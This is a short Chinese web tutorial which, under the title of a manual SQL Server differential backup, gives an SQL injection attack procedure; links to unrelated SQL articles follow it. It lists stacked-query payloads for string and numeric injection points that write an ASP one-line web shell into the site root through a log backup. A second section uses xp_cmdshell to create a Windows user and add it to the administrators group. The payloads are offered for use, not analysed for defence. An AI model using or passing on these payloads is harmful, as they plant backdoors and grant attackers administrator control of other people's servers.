sqlserver 手工實現(xiàn)差異備份的步驟
手工實現(xiàn)差異備份的步驟
字符型:
1、恢復(fù)當(dāng)前庫
;alter database 當(dāng)前庫 set RECOVERY FULL--
2、建表cmd
;create table cmd (a image)--
3、備份當(dāng)前庫到D:\cmd1
;backup log 當(dāng)前庫 to disk = 'D:\cmd1' with init--
4、插入一句話代碼到創(chuàng)建的表cmd
;insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--
5、備份一句話代碼到站點根目錄
;backup log 當(dāng)前庫 to disk = 'D:\www_web\oct.asp'--
6、完成
;drop table 創(chuàng)建的表--
數(shù)字型
1、恢復(fù)當(dāng)前庫
';alter database 當(dāng)前庫 set RECOVERY FULL--
2、創(chuàng)建表cmd
';create table cmd (a image)--
3、備份當(dāng)前庫到D:\cmd1
';backup log 當(dāng)前庫 to disk = 'D:\cmd1' with init--
4、插入一句話代碼到創(chuàng)建的表cmd
';insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--
5、備份一句話代碼到站點根目錄
';backup log 當(dāng)前庫 to disk = 'D:\www_web\oct.asp'--
6、完成
';drop table 創(chuàng)建的表--
sa權(quán)限創(chuàng)建管理員用戶
1、判斷是否有注入;and 1=1 ;and 1=2
;and user_name()='dbo' 判斷當(dāng)前系統(tǒng)的連接用戶是不是sa
2、添加系統(tǒng)的管理員
;exec master.dbo.xp_cmdshell 'net user wk wk90/add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators wk /add';--
逍遙復(fù)仇:有工具我是一定不會手工的,麻煩。
相關(guān)文章
SqlServer存儲過程實現(xiàn)及拼接sql的注意點
這篇文章主要介紹了SqlServer存儲過程實現(xiàn)及拼接sql的注意點的相關(guān)資料,非常不錯,具有參考借鑒價值,需要的朋友可以參考下2016-07-07
SQLServer 游標(biāo)的創(chuàng)建和使用基本步驟
游標(biāo)主要用于存儲過程、觸發(fā)器或T-SQL腳本中,當(dāng)需要遍歷查詢結(jié)果集中的每一行數(shù)據(jù)并進(jìn)行操作時,游標(biāo)就顯得非常有用,本文給大家介紹SQLServer 游標(biāo)的創(chuàng)建和使用基本步驟,感興趣的朋友一起看看吧2024-08-08
SQL?Server使用SELECT?INTO實現(xiàn)表備份的代碼示例
在數(shù)據(jù)庫管理過程中,有時我們需要對表進(jìn)行備份,以防數(shù)據(jù)丟失或修改錯誤,在?SQL?Server?中,可以使用?SELECT?INTO?語句將數(shù)據(jù)從一個表備份到另一個表,本文通過代碼示例介紹的非常詳細(xì),需要的朋友可以參考下2025-01-01
解析關(guān)于SQL語句Count的一點細(xì)節(jié)
本篇文章是對關(guān)于SQL語句Count的一點細(xì)節(jié)進(jìn)行了詳細(xì)的分析介紹,需要的朋友參考下2013-06-06

